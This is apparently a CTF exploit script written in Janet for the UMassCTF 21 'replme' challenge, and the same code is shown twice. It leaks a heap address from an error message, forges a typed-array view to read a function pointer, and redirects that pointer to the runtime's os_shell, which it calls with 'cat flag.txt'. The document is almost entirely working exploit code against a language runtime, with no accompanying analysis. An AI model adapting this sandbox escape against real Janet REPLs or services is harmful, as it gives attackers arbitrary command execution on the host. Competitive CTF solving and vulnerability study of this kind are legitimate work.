rick2600/xpl.janet Secret

## xpl.janet
# CTF: UMassCTF 21
# Challenge: replme
# Description: I found this new programming language and wanted people to be able to try it out. http://34.72.244.178:8085
# http://static.ctf.umasscybersec.org/pwn/8ff0476d-85f1-40f8-84ca-ade94b5b0169/janet.zip

(defn hex2n [x]
    (var res 0)
    (def  reversed (reverse x))
    (var c 0)
    (for i 0 (length reversed)
        (var v (get reversed i))
        (if (>= v 65)
            (set v (+ (- v 65) 10))
            (set v (- v 48))
        )
        (+= res (+ (blshift v c)))
        (+= c 4)
    )
    res
)

(defn leak [param]
    (var leaked @{})
    (try
        (do
            (param)
        )
        ([err]
            (print "Leaked array address: " (string/slice err 7 21))
            (put leaked :hi (hex2n (string/slice err 9 13)))
            (put leaked :lo (hex2n (string/slice err 13 21)))
        )
    )
    leaked
)


(var array @[print])
(var leaked (leak array))


(var buffer (tarray/buffer 8))
(var buffer_float64_view (tarray/new :float64 1 1 0 buffer))
(var buffer_uint32_view  (tarray/new :uint32  2 1 0 buffer))

(set (buffer_uint32_view 1) (+ 0xffff0000 (get leaked :hi)))
(set (buffer_uint32_view 0) (+ (get leaked :lo) 0x18))

# used to leak print (cfun_io_print) address
(var fake_buffer_uint32_view (tarray/new :uint32  10 1 0 (buffer_float64_view 0)))

# cfun_io_print + 0x3fd0 = &os_shell
(set (buffer_uint32_view 1) (get fake_buffer_uint32_view 1))
(set (buffer_uint32_view 0) (+ (get fake_buffer_uint32_view 0) 0x3fd0))


((buffer_float64_view 0) "cat flag.txt")
	# CTF: UMassCTF 21
	# Challenge: replme
	# Description: I found this new programming language and wanted people to be able to try it out. http://34.72.244.178:8085
	# http://static.ctf.umasscybersec.org/pwn/8ff0476d-85f1-40f8-84ca-ade94b5b0169/janet.zip

	(defn hex2n [x]
	(var res 0)
	(def reversed (reverse x))
	(var c 0)
	(for i 0 (length reversed)
	(var v (get reversed i))
	(if (>= v 65)
	(set v (+ (- v 65) 10))
	(set v (- v 48))
	)
	(+= res (+ (blshift v c)))
	(+= c 4)
	)
	res
	)

	(defn leak [param]
	(var leaked @{})
	(try
	(do
	(param)
	)
	([err]
	(print "Leaked array address: " (string/slice err 7 21))
	(put leaked :hi (hex2n (string/slice err 9 13)))
	(put leaked :lo (hex2n (string/slice err 13 21)))
	)
	)
	leaked
	)


	(var array @[print])
	(var leaked (leak array))


	(var buffer (tarray/buffer 8))
	(var buffer_float64_view (tarray/new :float64 1 1 0 buffer))
	(var buffer_uint32_view (tarray/new :uint32 2 1 0 buffer))

	(set (buffer_uint32_view 1) (+ 0xffff0000 (get leaked :hi)))
	(set (buffer_uint32_view 0) (+ (get leaked :lo) 0x18))

	# used to leak print (cfun_io_print) address
	(var fake_buffer_uint32_view (tarray/new :uint32 10 1 0 (buffer_float64_view 0)))

	# cfun_io_print + 0x3fd0 = &os_shell
	(set (buffer_uint32_view 1) (get fake_buffer_uint32_view 1))
	(set (buffer_uint32_view 0) (+ (get fake_buffer_uint32_view 0) 0x3fd0))


	((buffer_float64_view 0) "cat flag.txt")